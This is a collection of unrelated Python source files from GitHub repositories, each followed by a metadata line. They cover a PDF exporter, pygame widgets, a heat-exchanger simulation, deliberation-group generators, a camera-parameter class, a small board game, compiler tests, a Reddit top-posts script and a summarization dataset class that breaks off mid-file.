"--motd",
type=str,
help="Message to display under main title",
default=None,
)
args = parser.parse_args()
exporter = TriliumPdfExporter(args.source, args.motd)
exporter.export(preserve=args.preserve)
| iTecAI/trilium-tools | pdf-export/trilium_to_pdf.py | trilium_to_pdf.py | py | 11,045 | python | en | code | 2 | github-code | 36 |
4472644976 | import pygame as pg
from gui.widgets.animated_widget import AnimatedWidget
from data.constants import *
class BackgroundImage(AnimatedWidget):
def __init__(self, x, y, w, h, image):
super().__init__()
self.pos = x, y
self.image = pg.transform.smoothscale(pg.image.load(image).convert_alpha(), (w, h))
def update(self, dt, animation_state=WAIT, time_elapsed=0.0):
if animation_state == WAIT and self.image.get_alpha() !=255:
self.image.set_alpha(255)
elif animation_state == OPEN:
self.image.set_alpha(round(255 * time_elapsed))
elif animation_state == CLOSE:
self.image.set_alpha(round(255 * (1 - time_elapsed)))
def draw(self, screen, animation_state=WAIT):
screen.blit(self.image, self.pos)
__all__ = ["BackgroundImage"]
| IldarRyabkov/BubbleTanks2 | src/gui/widgets/background_image.py | background_image.py | py | 834 | python | en | code | 37 | github-code | 36 |
5967270915 | # Sun Oct 27 15:40:29 2019
import numpy as np
import matplotlib.pyplot as plt
import matplotlib as mpl
# Configurations
mpl.rcParams['font.family'] = 'serif'
mpl.rcParams['font.size'] = 20
mpl.rcParams['font.weight'] = 'medium'
mpl.rcParams['font.style'] = 'normal'
mpl.rcParams['font.serif'] = 'DejaVu Serif'
mpl.rcParams['mathtext.fontset'] = 'stix'
mpl.rcParams['mathtext.fallback_to_cm'] = True
mpl.rcParams['lines.linewidth'] = 2
mpl.rcParams['savefig.dpi'] = 300
mpl.rcParams['savefig.bbox'] = 'tight'
###################### thermophysical prop ##################
cL = 4183.0
cS = 700.0
rhoL = 994.0 # kg/m3
rhoS = 7850.0 # kg/m3
h = 12000.0 # W/m2 K
kappaL = 0.682
kappaS = 1.3
###################### constants ############################
TH0 = 45
TC0 = 10
Ri = 0.05 # inner radius
Rs = 0.06
Ro = 0.08 # outer radius
pi = np.pi
Ac = pi * Ri**2
As = pi * Rs**2 - Ac
Ah = pi * Ro**2 - pi * Rs**2
L = 6.0 # length
S1 = L * pi * 2 * Rs
S2 = L * pi * 2 * Ri
uh = 0.3
uc = 0.3
Qh = uh * Ah
Qc = uc * Ac
dt = 0.01
t = np.arange(0, 200+dt, dt)
Th2 = np.zeros(len(t))
Tc2 = np.zeros(len(t))
Th2[0] = TH0
Tc2[0] = TC0
nx = 50
dx = L / nx
x = np.arange(dx/2, L+dx/2, dx)
TH = np.zeros(nx)
TS = np.zeros(nx)
TC = np.zeros(nx)
TH[:] = TH0
TS[:] = 0.5 * (TH0 + TC0)
TC[:] = TC0
TH_prev = TH.copy()
TS_prev = TS.copy()
TC_prev = TC.copy()
Th1 = np.zeros(len(t))
Tc1 = np.zeros(len(t))
Th1[:] = TH0
Tc1[:] = TC0
idx = int(100/dt)
Th1[idx::] = TH0 + 10
Tc1[idx::] = TC0
Si1 = S1 / nx
Si2 = S2 / nx
for it in range(len(t)-1):
rhs = Qh * cL * rhoL * (Th1[it] - TH_prev[0]) - h * Si1 * (TH_prev[0] - TS_prev[0])
rhs = rhs - kappaL * Ah * (TH_prev[0] - TH_prev[1]) / dx
temp = rhs * dt / (cL * rhoL * Ah * dx)
TH[0] = TH_prev[0] + temp
rhs = h * Si1 * (TH_prev[0] - TS_prev[0]) - h * Si2 * (TS_prev[0] - TC_prev[-1])
rhs = rhs - kappaS * As * (TS_prev[0] - TS_prev[1]) / dx
temp = rhs * dt / (cS * rhoS * As * dx)
TS[0] = TS_prev[0] + temp
rhs = Qc * cL * rhoL * (Tc1[it] - TC_prev[0]) + h * Si2 * (TS_prev[-1] - TC_prev[0])
rhs = rhs - kappaL * Ac * (TC_prev[0] - TC_prev[1]) / dx
temp = rhs * dt / (cL * rhoL * Ac * dx)
TC[0] = TC_prev[0] + temp
for ix in range(1,nx-1):
rhs = Qh * cL * rhoL * (TH_prev[ix-1] - TH_prev[ix]) - h * Si1 * (TH_prev[ix] - TS_prev[ix])
rhs = rhs + kappaL * Ah * (TH_prev[ix-1] - TH_prev[ix]) / dx - kappaL * Ah * (TH_prev[ix] - TH_prev[ix+1]) / dx
temp = rhs * dt / (cL * rhoL * Ah * dx)
TH[ix] = TH_prev[ix] + temp
rhs = h * Si1 * (TH_prev[ix] - TS_prev[ix]) - h * Si2 * (TS_prev[ix] - TC_prev[nx-ix-1])
rhs = rhs + kappaS * As * (TS_prev[ix-1] - TS_prev[ix]) / dx - kappaS * As * (TS_prev[ix] - TS_prev[ix+1]) / dx
temp = rhs * dt / (cS * rhoS * As * dx)
TS[ix] = TS_prev[ix] + temp
rhs = Qc * cL * rhoL * (TC_prev[ix-1] - TC_prev[ix]) + h * Si2 * (TS_prev[nx-ix-1] - TC[ix])
rhs = rhs + kappaL * Ac * (TC_prev[ix-1] - TC_prev[ix]) / dx - kappaL * Ac * (TC_prev[ix] - TC_prev[ix+1]) / dx
temp = rhs * dt / (cL * rhoL * Ac * dx)
TC[ix] = TC_prev[ix] + temp
rhs = Qh * cL * rhoL * (TH_prev[-2] - TH_prev[-1]) - h * Si1 * (TH_prev[-1] - TS_prev[-1])
rhs = rhs + kappaL * Ah * (TH_prev[-2] - TH_prev[-1]) / dx
temp = rhs * dt / (cL * rhoL * Ah * dx)
TH[-1] = TH_prev[-1] + temp
rhs = h * Si1 * (TH_prev[-1] - TS_prev[-1]) - h * Si2 * (TS_prev[-1] - TC_prev[0])
rhs = rhs + kappaS * As * (TS_prev[-2] - TS_prev[-1]) / dx
temp = rhs * dt / (cS * rhoS * As * dx)
TS[-1] = TS_prev[-1] + temp
rhs = Qc * cL * rhoL * (TC_prev[-2] - TC_prev[-1]) + h * Si2 * (TS_prev[0] - TC_prev[-1])
rhs = rhs + kappaL * Ac * (TC_prev[-2] - TC_prev[-1]) / dx
temp = rhs * dt / (cL * rhoL * Ac * dx)
TC[-1] = TC_prev[-1] + temp
for j in range(0,nx):
TH_prev[j] = TH[j]
TS_prev[j] = TS[j]
TC_prev[j] = TC[j]
Th2[it+1] = TH[-1]
Tc2[it+1] = TC[-1]
fig = plt.figure(figsize = (10,7))
ax = plt.subplot(111)
ax.plot(t, Th1, label = 'Hot in')
ax.plot(t, Tc1, label = 'Cold in')
ax.plot(t, Th2, label = 'Hot out')
ax.plot(t, Tc2, label = 'Cold out')
ax.set_xlabel('Time (s)')
ax.set_ylabel('Temperature (K)')
ax.legend(loc=0)
plt.show()
fig = plt.figure(figsize = (10,7))
ax = plt.subplot(111)
ax.plot(x, TH, label = 'Hot')
ax.plot(x, TS, label = 'Surface')
ax.plot(x, TC[::-1], label='Cold')
#ax.set_xlim(0,6)
ax.set_xlabel('X (m)')
ax.set_ylabel('Temperature (K)')
ax.legend(loc=0)
plt.show()
| NingDaoguan/JI | PO6007-MSTPS/HW/HW3.py | HW3.py | py | 4,599 | python | en | code | 0 | github-code | 36 |
22041239484 | import random
def get_long_path_stage_groups(N, M, stage, lowest=2):
"""Find groups for a particular stage using long-path network.
# Params
N: Number of participants (integer, must be > 0).
M: Group size (integer, must be >= 2).
stage: Stage of deliberation (integer, must be >= 0).
lowest: Begin with the first modulus >= lowest.
# Returns
A list, with each element a set of participant ids corresponding to a group.
Participants are given integer ids in [0, N-1].
"""
modulus = [
1, 2, 3, 5, 7, 11, 13, 17, 19, 23, 29,
31, 37, 41, 43, 47, 53, 59, 61, 67, 71,
73, 79, 83, 89, 97,101,103,107,109,113,
127,131,137,139,149,151,157,163,167,173,
179,181,191,193,197,199,211,223,227,229,
233,239,241,251,257,263,269,271,277,281,
283,293,307,311,313,317,331,337,347,349,
353,359,367,373,379,383,389,397,401,409,
419,421,431,433,439,443,449,457,461,463,
467,479,487,491,499,503,509,521,523,541,
547,557,563,569,571,577,587,593,599,601,
607,613,617,619,631,641,643,647,653,659,
661,673,677,683,691,701,709,719,727,733,
739,743,751,757,761,769,773,787,797,809,
811,821,823,827,829,839,853,857,859,863,
877,881,883,887,907,911,919,929,937,941,
947,953,967,971,977,983,991,997,1009,1013
]
# Remove excluded moduli
if lowest is not None and lowest > 1:
modulus = [1] + [x for x in modulus if x >= lowest]
# If stage is too high, modulus sets will be smaller than M
# Correct for the above by resetting stage after an upper limit
num_groups = int(N / M)
num_moduli = [i for i, m in enumerate(modulus) if m > num_groups][0]
stage = stage % num_moduli
if stage == 0:
m = 1
else:
m = modulus[stage]
partition = []
for j in range(m):
# Generate
residue_class = [n for n in range(N) if n % m == j]
chunks = [
set(residue_class[k:k+M])
for k in range(0, len(residue_class), M)]
partition += chunks
return partition
def get_long_path_stages(N, M, D):
"""Find groups all stages using long-path network.
# Params
N: Number of participants (integer, must be > 0).
M: Group size (integer, must be >= 2).
D: Number of stages (integer, must be > 0).
# Returns
A list of D elements.
Each element is a list as returned by get_long_path_stage_groups().
"""
stages = []
for i in range(D):
groups = get_long_path_stage_groups(N, M, i)
stages.append(groups)
return stages
def get_random_stage_groups(N, M, i):
"""Find groups for a particular stage using random network.
# Params
N: Number of participants (integer, must be > 0).
M: Group size (integer, must be >= 2).
stage: Stage of deliberation (integer, must be >= 0).
# Returns
A list, with each element a set of participant ids corresponding to a group.
Participants are given integer ids in [0, N-1].
"""
nodes = list(range(N))
random.shuffle(nodes)
groups = [set(nodes[k:k+M]) for k in range(0, N, M)]
return groups
def get_random_groups(N, M, D):
"""Find groups all stages using long-path network.
# Params
N: Number of participants (integer, must be > 0).
M: Group size (integer, must be >= 2).
D: Number of stages (integer, must be > 0).
# Returns
A list of D elements.
Each element is a list as returned by get_random_stage_groups().
"""
groups = sum([get_random_stage_groups(N, M, i) for i in range(D)], [])
return groups
| elplatt/Exp-Net-Delib | netdelib/topologies/topologies.py | topologies.py | py | 3,706 | python | en | code | 0 | github-code | 36 |
21241359849 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from rtm.executor import LoopMaster
__author__ = 'David Qian'
"""
Created on 02/15/2017
@author: David Qian
"""
if __name__ == '__main__':
cmd = './test/test.sh'
restart_time = '0'
workdir = None
master = LoopMaster(cmd, restart_time, workdir)
master.run()
| krizex/RunnerTimer | src/rtm/demo.py | demo.py | py | 329 | python | en | code | 0 | github-code | 36 |
43354784770 | import json
from typing import Any, List
import numpy as np
import torch
from mmhuman3d.core.conventions.cameras import (
convert_cameras,
convert_K_3x3_to_4x4,
convert_K_4x4_to_3x3,
)
class CameraParameter:
def __init__(self,
name: str = 'default',
H: int = 1080,
W: int = 1920) -> None:
"""
Args:
name (str, optional):
Name of this camera. Defaults to "default".
H (int, optional):
Height of a frame, in pixel. Defaults to 1080.
W (int, optional):
Width of a frame, in pixel. Defaults to 1920.
"""
self.name = name
self.parameters_dict = {}
in_mat = __zero_mat_list__(3)
self.parameters_dict['in_mat'] = in_mat
for distort_name in __distort_coefficient_names__:
self.parameters_dict[distort_name] = 0.0
self.parameters_dict['H'] = H
self.parameters_dict['W'] = W
r_mat = __zero_mat_list__(3)
self.parameters_dict['rotation_mat'] = r_mat
t_list = [0.0, 0.0, 0.0]
self.parameters_dict['translation'] = t_list
def reset_distort(self):
"""Reset all distort coefficients to zero."""
for distort_name in __distort_coefficient_names__:
self.parameters_dict[distort_name] = 0.0
def get_opencv_distort_mat(self):
"""Get a numpy array of 8 distort coefficients, which is the distCoeffs
arg of cv2.undistort.
Returns:
ndarray:
(k_1, k_2, p_1, p_2, k_3, k_4, k_5, k_6) of 8 elements.
"""
dist_coeffs = [
self.get_value('k1'),
self.get_value('k2'),
self.get_value('p1'),
self.get_value('p2'),
self.get_value('k3'),
self.get_value('k4'),
self.get_value('k5'),
self.get_value('k6'),
]
dist_coeffs = np.array(dist_coeffs)
return dist_coeffs
def set_K_R_T(self,
K_mat: np.ndarray,
R_mat: np.ndarray,
T_vec: np.ndarray,
inverse_extrinsic: bool = False) -> None:
"""Set intrinsic and extrinsic of a camera.
Args:
K_mat (np.ndarray):
In shape [3, 3].
R_mat (np.ndarray):
Rotation from world to view in default.
In shape [3, 3].
T_vec (np.ndarray):
Translation from world to view in default.
In shape [3,].
inverse_extrinsic (bool, optional):
If true, R_mat and T_vec transform a point
from view to world. Defaults to False.
"""
k_shape = K_mat.shape
assert k_shape[0] == k_shape[1] == 3
r_shape = R_mat.shape
assert r_shape[0] == r_shape[1] == 3
assert T_vec.ndim == 1 and T_vec.shape[0] == 3
self.set_mat_np('in_mat', K_mat)
if inverse_extrinsic:
R_mat = np.linalg.inv(R_mat)
T_vec = -np.dot(R_mat, T_vec).reshape((3))
self.set_mat_np('rotation_mat', R_mat)
self.set_value('translation', T_vec.tolist())
def set_mat_np(self, mat_key: str, mat_numpy: np.ndarray) -> None:
"""Set a matrix-type parameter to mat_numpy.
Args:
mat_key (str):
Key of the target matrix. in_mat or rotation_mat.
mat_numpy (ndarray):
Matrix in numpy format.
Raises:
KeyError: mat_key not in self.parameters_dict
"""
if mat_key not in self.parameters_dict:
raise KeyError(mat_key)
else:
self.parameters_dict[mat_key] = mat_numpy.tolist()
def set_mat_list(self, mat_key: str, mat_list: List[list]) -> None:
"""Set a matrix-type parameter to mat_list.
Args:
mat_key (str):
Key of the target matrix. in_mat or rotation_mat.
mat_list (List[list]):
Matrix in list format.
Raises:
KeyError: mat_key not in self.parameters_dict
"""
if mat_key not in self.parameters_dict:
raise KeyError(mat_key)
else:
self.parameters_dict[mat_key] = mat_list
def set_value(self, key: str, value: Any) -> None:
"""Set a parameter to value.
Args:
key (str):
Name of the parameter.
value (object):
New value of the parameter.
Raises:
KeyError: key not in self.parameters_dict
"""
if key not in self.parameters_dict:
raise KeyError(key)
else:
self.parameters_dict[key] = value
def get_value(self, key: str) -> Any:
"""Get a parameter by key.
Args:
key (str):
Name of the parameter.
Raises:
KeyError: key not in self.parameters_dict
Returns:
object:
Value of the parameter.
"""
if key not in self.parameters_dict:
raise KeyError(key)
else:
return self.parameters_dict[key]
def get_mat_np(self, key: str) -> Any:
"""Get a a matrix-type parameter by key.
Args:
key (str):
Name of the parameter.
Raises:
KeyError: key not in self.parameters_dict
Returns:
object:
Value of the parameter.
"""
if key not in self.parameters_dict:
raise KeyError(key)
else:
mat_list = self.parameters_dict[key]
mat_np = np.array(mat_list).reshape((3, 3))
return mat_np
def to_string(self) -> str:
"""Convert self.to_dict() to a string.
Returns:
str:
A dict in json string format.
"""
dump_dict = self.to_dict()
ret_str = json.dumps(dump_dict)
return ret_str
def to_dict(self) -> dict:
"""Dump camera name and parameters to dict.
Returns:
dict:
Put self.name and self.parameters_dict
in one dict.
"""
dump_dict = self.parameters_dict.copy()
dump_dict['name'] = self.name
return dump_dict
def dump(self, json_path: str) -> None:
"""Dump camera name and parameters to a file.
Returns:
dict:
Put self.name and self.parameters_dict
in one dict, and dump them to a json file.
"""
dump_dict = self.to_dict()
with open(json_path, 'w') as f_write:
json.dump(dump_dict, f_write)
def load(self, json_path: str) -> None:
"""Load camera name and parameters from a file."""
with open(json_path, 'r') as f_read:
dumped_dict = json.load(f_read)
self.load_from_dict(dumped_dict)
def load_from_dict(self, json_dict: dict) -> None:
"""Load name and parameters from a dict.
Args:
json_dict (dict):
A dict comes from self.to_dict().
"""
for key in json_dict.keys():
if key == 'name':
self.name = json_dict[key]
elif key == 'rotation':
self.parameters_dict['rotation_mat'] = np.array(
json_dict[key]).reshape(3, 3).tolist()
elif key == 'translation':
self.parameters_dict[key] = np.array(json_dict[key]).reshape(
(3)).tolist()
else:
self.parameters_dict[key] = json_dict[key]
if '_mat' in key:
self.parameters_dict[key] = np.array(
self.parameters_dict[key]).reshape(3, 3).tolist()
def load_from_chessboard(self,
chessboard_dict: dict,
name: str,
inverse: bool = True) -> None:
"""Load name and parameters from a dict.
Args:
chessboard_dict (dict):
A dict loaded from json.load(chessboard_file).
name (str):
Name of this camera.
inverse (bool, optional):
Whether to inverse rotation and translation mat.
Defaults to False.
"""
camera_param_dict = \
__parse_chessboard_param__(chessboard_dict, name, inverse=inverse)
self.load_from_dict(camera_param_dict)
def load_from_vibe(self,
vibe_camera,
name: str,
batch_index: int = 0) -> None:
"""Load name and parameters from a dict.
Args:
vibe_camera (mmhuman3d.core.cameras.
cameras.WeakPerspectiveCamerasVibe):
An instance.
name (str):
Name of this camera.
"""
height = self.parameters_dict['H']
width = self.parameters_dict['W']
k_4x4 = vibe_camera.K[batch_index:batch_index + 1] # shape (1, 4, 4)
r_3x3 = vibe_camera.R[batch_index:batch_index + 1] # shape (1, 3, 3)
t_3 = vibe_camera.T[batch_index:batch_index + 1] # shape (1, 3)
new_K, new_R, new_T = convert_cameras(
K=k_4x4,
R=r_3x3,
T=t_3,
is_perspective=False,
convention_src='pytorch3d',
convention_dst='opencv',
resolution_src=(height, width),
resolution_dst=(height, width))
k_3x3 = \
convert_K_4x4_to_3x3(new_K, is_perspective=False)
k_3x3.numpy().squeeze(0)
r_3x3 = new_R.numpy().squeeze(0)
t_3 = new_T.numpy().squeeze(0)
self.name = name
self.set_mat_np('in_mat', k_3x3)
self.set_mat_np('rotation_mat', r_3x3)
self.set_value('translation', t_3.tolist())
def get_vibe_dict(self) -> dict:
"""Get a dict of camera parameters, which contains all necessary args
for mmhuman3d.core.cameras.cameras.WeakPerspectiveCamerasVibe(). Use mm
human3d.core.cameras.cameras.WeakPerspectiveCamerasVibe(**return_dict)
to construct a camera.
Returns:
dict:
A dict of camera parameters: name, dist, size, matrix, etc.
"""
height = self.parameters_dict['H']
width = self.parameters_dict['W']
k_3x3 = self.get_mat_np('in_mat') # shape (3, 3)
k_3x3 = np.expand_dims(k_3x3, 0) # shape (1, 3, 3)
k_4x4 = convert_K_3x3_to_4x4(
K=k_3x3, is_perspective=False) # shape (1, 4, 4)
rotation = self.get_mat_np('rotation_mat') # shape (3, 3)
rotation = np.expand_dims(rotation, 0) # shape (1, 3, 3)
translation = self.get_value('translation') # list, len==3
translation = np.asarray(translation)
translation = np.expand_dims(translation, 0) # shape (1, 3)
new_K, new_R, new_T = convert_cameras(
K=k_4x4,
R=rotation,
T=translation,
is_perspective=False,
convention_src='opencv',
convention_dst='pytorch3d',
resolution_src=(height, width),
resolution_dst=(height, width))
new_K = torch.from_numpy(new_K)
new_R = torch.from_numpy(new_R)
new_T = torch.from_numpy(new_T)
ret_dict = {
'K': new_K,
'R': new_R,
'T': new_T,
}
return ret_dict
def __parse_chessboard_param__(chessboard_camera_param, name, inverse=True):
"""Parse a dict loaded from chessboard file into another dict needed by
CameraParameter.
Args:
chessboard_camera_param (dict):
A dict loaded from json.load(chessboard_file).
name (str):
Name of this camera.
inverse (bool, optional):
Whether to inverse rotation and translation mat.
Defaults to True.
Returns:
dict:
A dict of parameters in CameraParameter.to_dict() format.
"""
camera_param_dict = {}
camera_param_dict['H'] = chessboard_camera_param['imgSize'][1]
camera_param_dict['W'] = chessboard_camera_param['imgSize'][0]
camera_param_dict['in_mat'] = chessboard_camera_param['K']
camera_param_dict['k1'] = 0
camera_param_dict['k2'] = 0
camera_param_dict['k3'] = 0
camera_param_dict['k4'] = 0
camera_param_dict['k5'] = 0
camera_param_dict['p1'] = 0
camera_param_dict['p2'] = 0
camera_param_dict['name'] = name
camera_param_dict['rotation'] = chessboard_camera_param['R']
camera_param_dict['translation'] = chessboard_camera_param['T']
if inverse:
rmatrix = np.linalg.inv(
np.array(camera_param_dict['rotation']).reshape(3, 3))
camera_param_dict['rotation'] = rmatrix.tolist()
tmatrix = np.array(camera_param_dict['translation']).reshape((3, 1))
tvec = -np.dot(rmatrix, tmatrix)
camera_param_dict['translation'] = tvec.reshape((3)).tolist()
return camera_param_dict
__distort_coefficient_names__ = [
'k1', 'k2', 'k3', 'k4', 'k5', 'k6', 'p1', 'p2'
]
def __zero_mat_list__(n=3):
"""Return a zero mat in list format.
Args:
n (int, optional):
Length of the edge.
Defaults to 3.
Returns:
list:
List[List[int]]
"""
ret_list = [[0] * n for _ in range(n)]
return ret_list
| hanabi7/point_cloud_smplify | mmhuman3d/core/cameras/camera_parameter.py | camera_parameter.py | py | 13,594 | python | en | code | 6 | github-code | 36 |
16269675107 | # Very simplified version with ASCII-based graphics
import random
class KnockoutLite:
board_len = 3
num_penguins = 1
num_players = 2
dead_flag = ['dead']
is_dead = lambda p : p == ['dead']
def __init__(self):
self.penguins = []
self.move_number = 1
for i in range(KnockoutLite.num_players * KnockoutLite.num_penguins):
self.penguins.append([random.randrange(KnockoutLite.board_len), random.randrange(KnockoutLite.board_len)])
def display_game_results(self):
if any(map(KnockoutLite.is_dead, self.penguins)):
if all(map(KnockoutLite.is_dead, self.penguins)):
print("It's a tie! (both players died)")
elif KnockoutLite.is_dead(self.penguins[0]):
print("Player 2 wins.")
else:
print("Player 1 wins.")
else:
print("Game is still running...")
def is_in_board(self, penguin_idx):
penguin = self.penguins[penguin_idx]
if KnockoutLite.is_dead(penguin):
return False
in_board = True
for dim in range(2):
in_board = in_board and penguin[dim] >= 0 and penguin[dim] < KnockoutLite.board_len
return in_board
def draw_board(self):
self.board = [['-' for r in range(KnockoutLite.board_len)] for c in range(KnockoutLite.board_len)]
check_and_update = lambda curr, new : curr + new if curr != '-' else new
for p_idx in range(len(self.penguins)):
p = self.penguins[p_idx]
if self.is_in_board(p_idx):
symbol = 'X' if p_idx // KnockoutLite.num_penguins == 0 else 'O'
self.board[p[0]][p[1]] = check_and_update(self.board[p[0]][p[1]], symbol)
for r in self.board:
print(' '.join(r))
# Print a new line
print()
@staticmethod
def swap_elems(lst, i, j):
temp = lst[i]
lst[i] = lst[j]
lst[j] = temp
def move_penguin(self, penguin_idx, direction):
for dim in range(2):
self.penguins[penguin_idx][dim] += direction[dim]
# Returns whether game can continue after executed play
def execute_play(self, directions, powers):
print("-"*8 + " Executing play number " + str(self.move_number) + " " + "-"*8)
p1_prev = self.penguins[0].copy()
p2_prev = self.penguins[1].copy()
player_is_out = False
while max(powers) > 0:
for p_idx in range(KnockoutLite.num_players):
if powers[p_idx] > 0 and not KnockoutLite.is_dead(self.penguins[p_idx]):
self.move_penguin(p_idx, directions[p_idx])
powers[p_idx] -= 1
if not self.is_in_board(p_idx):
self.penguins[p_idx] = KnockoutLite.dead_flag
player_is_out = True
# Emulate collisions by simply switching the velocities on impact
# (physically accurate since momentum is conserved)
if not player_is_out and (self.penguins[0] == self.penguins[1] or (self.penguins[0] == p2_prev and self.penguins[1] == p1_prev)):
KnockoutLite.swap_elems(directions, 0, 1)
KnockoutLite.swap_elems(powers, 0, 1)
if self.penguins[0] != self.penguins[1]:
KnockoutLite.swap_elems(self.penguins, 0, 1)
powers = list(map(lambda x: x + 1, powers))
elif all(map(KnockoutLite.is_dead, self.penguins)):
return False
self.draw_board()
p1_prev = self.penguins[0].copy()
p2_prev = self.penguins[1].copy()
self.move_number += 1
return not player_is_out
# Running the game
def update_game_params(p_inps, directions, powers):
directions.append([-int(p_inps[1]), int(p_inps[0])])
powers.append(int(p_inps[2]))
if __name__ == '__main__':
game = KnockoutLite()
run_game = True
print("Welcome, Player 1 is 'X', Player 2 is 'O'. The positive x and y directions are right and up, respectively. Each input line consists of 3 ** integers ** seperated by spaces. Each direction dimension's range is [-1, 1]. The power must be in the range [1, 3].")
game.draw_board()
while run_game:
directions = []
powers = []
print("Enter Player 1 direction and power: dirx diry pow ")
p1_inps = input().split(" ")
print("Enter Player 2 direction and power: dirx diry pow")
p2_inps = input().split(" ")
update_game_params(p1_inps, directions, powers)
update_game_params(p2_inps, directions, powers)
run_game = game.execute_play(directions, powers)
game.display_game_results()
| ashuk203/knockout-ai | Simple-version/game.py | game.py | py | 4,764 | python | en | code | 0 | github-code | 36 |
23942544871 | """Assorted algorithms to verify end-to-end compiler functionality.
These tests include:
- Sum of array of integers
- Recursive Fibonacci sum
"""
import pytest
import tempfile
import functools
import os
from acctools import compilers
ACC_PATH=os.environ.get("ACC_PATH", os.path.join(os.path.dirname(__file__), "../build/acc"))
COMPILERS = [
compilers.GccCompiler,
functools.partial(compilers.AccIrCompiler, ACC_PATH, regalloc=False),
functools.partial(compilers.AccIrCompiler, ACC_PATH, regalloc=True),
functools.partial(compilers.AccAsmCompiler, ACC_PATH)
]
@pytest.fixture(params=COMPILERS)
def cc(request):
with tempfile.NamedTemporaryFile() as temp_file:
return request.param(temp_file.name)
CALCULATE_SUM = """
int calc_sum(unsigned char * arr, int n)
{
int i = 0, tot = 0;
while(i < n)
{
tot += arr[i++];
}
return tot;
}
int main()
{
unsigned char arr[7];
arr[0] = 1;
arr[1] = 2;
arr[2] = 4;
arr[3] = 8;
arr[4] = 16;
arr[5] = 32;
arr[6] = 64;
return calc_sum(arr, 7);
}
"""
def test_calculate_array_sum(cc):
cc.program(CALCULATE_SUM, returncode=127);
FIBONACCI = """
int fib(int n)
{
if(n == 0) return 1;
if(n == 1) return 1;
return fib(n-1) + fib(n-2);
}
int main()
{
int i = 0, tot = 0;
while(i < 10)
{
tot += fib(i);
i++;
}
return tot;
}
"""
def test_fibonacci(cc):
cc.program(FIBONACCI, returncode=143)
INSERTION_SORT = """
int sort(int * arr, int n)
{
int i = 1;
while(i < n)
{
int t = arr[i];
int j = i - 1;
while((t < arr[j]) & (j != -1))
{
arr[j+1] = arr[j];
j--;
}
arr[j+1] = t;
i++;
}
}
int main()
{
int l[10];
l[0] = 3;
l[1] = 8;
l[2] = 9;
l[3] = 121;
l[4] = 28;
l[5] = 1;
l[6] = 89;
l[7] = 90;
l[8] = 104;
l[9] = 101;
sort(l, 10);
return (l[0] != 1) | (l[9] != 121);
}
"""
def test_sort(cc):
cc.program(INSERTION_SORT) | alexking35h/acc | functional/test_algorithms.py | test_algorithms.py | py | 2,059 | python | en | code | 1 | github-code | 36 |
10179832367 | #!/usr/bin/python3
"""
Prints the titles of the first 10 hot posts listed for a given subreddit
"""
import requests
def top_ten(subreddit):
"""
Prints the titles of the first
10 hot posts listed for a given subreddit
"""
if subreddit is None or not isinstance(subreddit, str):
print("None")
user_agent = {'User-agent': 'Google Chrome Version 81.0.4044.129'}
params = {'limit': 10}
url = 'https://www.reddit.com/r/{}/hot/.json'.format(subreddit)
response = requests.get(url, headers=user_agent, params=params)
results = response.json()
try:
my_data = results['data']['children']
for i in my_data:
print(i['data']['title'])
except Exception:
print("None")
| jamesAlhassan/alx-system_engineering-devops | 0x16-api_advanced/1-top_ten.py | 1-top_ten.py | py | 756 | python | en | code | 0 | github-code | 36 |
1710822043 | import logging
import warnings
import torch
import numpy as np
from data import data_utils
from data.ofa_dataset import OFADataset
logger = logging.getLogger(__name__)
warnings.filterwarnings("ignore", "(Possibly )?corrupt EXIF data", UserWarning)
def collate(samples, pad_idx, eos_idx):
if len(samples) == 0:
return {}
def merge(key):
return data_utils.collate_tokens(
[s[key] for s in samples],
pad_idx,
eos_idx=eos_idx,
)
src_tokens = merge("source")
src_lengths = torch.LongTensor([s["source"].ne(pad_idx).long().sum() for s in samples])
prev_output_tokens = None
target = None
if samples[0].get("target", None) is not None:
target = merge("target")
tgt_lengths = torch.LongTensor(
[s["target"].ne(pad_idx).long().sum() for s in samples]
)
ntokens = tgt_lengths.sum().item()
if samples[0].get("prev_output_tokens", None) is not None:
prev_output_tokens = merge("prev_output_tokens")
else:
ntokens = src_lengths.sum().item()
target_strs = np.array([s["target_str"] for s in samples])
batch = {
"nsentences": len(samples),
"ntokens": ntokens,
"net_input": {
"src_tokens": src_tokens,
"src_lengths": src_lengths,
"prev_output_tokens": prev_output_tokens
},
"target": target,
"target_strs": target_strs
}
return batch
class SummaryDataset(OFADataset):
def __init__(
self,
split,
dataset,
bpe,
src_dict,
tgt_dict=None,
code_dict_size=8192,
num_bins=1000,
max_src_length=512,
max_tgt_length=128,
noise_ratio=0.0,
description='base'
):
super().__init__(split, dataset, bpe, src_dict, tgt_dict)
self.max_src_length = max_src_length
self.max_tgt_length = max_tgt_length
self.code_dict_size = code_dict_size
self.num_bins = num_bins
self.noise_ratio = noise_ratio
self.description = description
if type(bpe).__name__ == 'GPT2BPE':
if self.description == 'base':
self.prompt = ' what is the summary of article " {} "?'
elif self.description == 'tep':
self.prompt = 'Dataset description: Gigaword is a large-scale dataset for natural language processing tasks, such as language modeling and machine translation. It contains over 5 billion words of text, drawn from a variety of sources, including news articles, books, and websites.The annotation process for Gigaword involves collecting text from a variety of sources and ensuring that it is accurately' \
' transcribed and formatted. The text is then divided into smaller units, such as sentences or paragraphs, and annotated with additional information, such as part-of-speech tags or named entity tags. ' \
'Input format: Text' \
'Output format: Text' \
'Output description: summary of input text' \
'prompt: what is the summary of article " {} "? '
elif self.description == 'wiki-tep':
self.prompt = 'Given a document, selecting a subset of the words or sentences which best represents a summary of the document.' \
'Dataset description: Gigaword is a large-scale dataset for natural language processing tasks, such as language modeling and machine translation. It contains over 5 billion words of text, drawn from a variety of sources, including news articles, books, and websites.The annotation process for Gigaword involves collecting text from a variety of sources and ensuring that it is accurately' \
' transcribed and formatted. The text is then divided into smaller units, such as sentences or paragraphs, and annotated with additional information, such as part-of-speech tags or named entity tags. ' \
'Input format: Text' \
'Output format: Text' \
'Output description: summary of input text' \
'prompt: what is the summary of article " {} "? '
elif self.description == 'annotation':
self.prompt = \
'Dataset description: Gigaword is a large-scale dataset for natural language processing tasks, such as language modeling and machine translation. It contains over 5 billion words of text, drawn from a variety of sources, including news articles, books, and websites.The annotation process for Gigaword involves collecting text from a variety of sources and ensuring that it is accurately' \
' transcribed and formatted. The text is then divided into smaller units, such as sentences or paragraphs, and annotated with additional information, such as part-of-speech tags or named entity tags. ' \
'Input format: Text' \
'Output format: Text' \
'Output description: summary of input text' \
'prompt: what is the summary of article " {} "? '
elif self.description == 'wiki':
self.prompt = \
'Given a document, selecting a subset of the words or sentences which best represents a summary of the document.' \
'prompt: what is the summary of article " {} "? '
elif description == 'onehot':
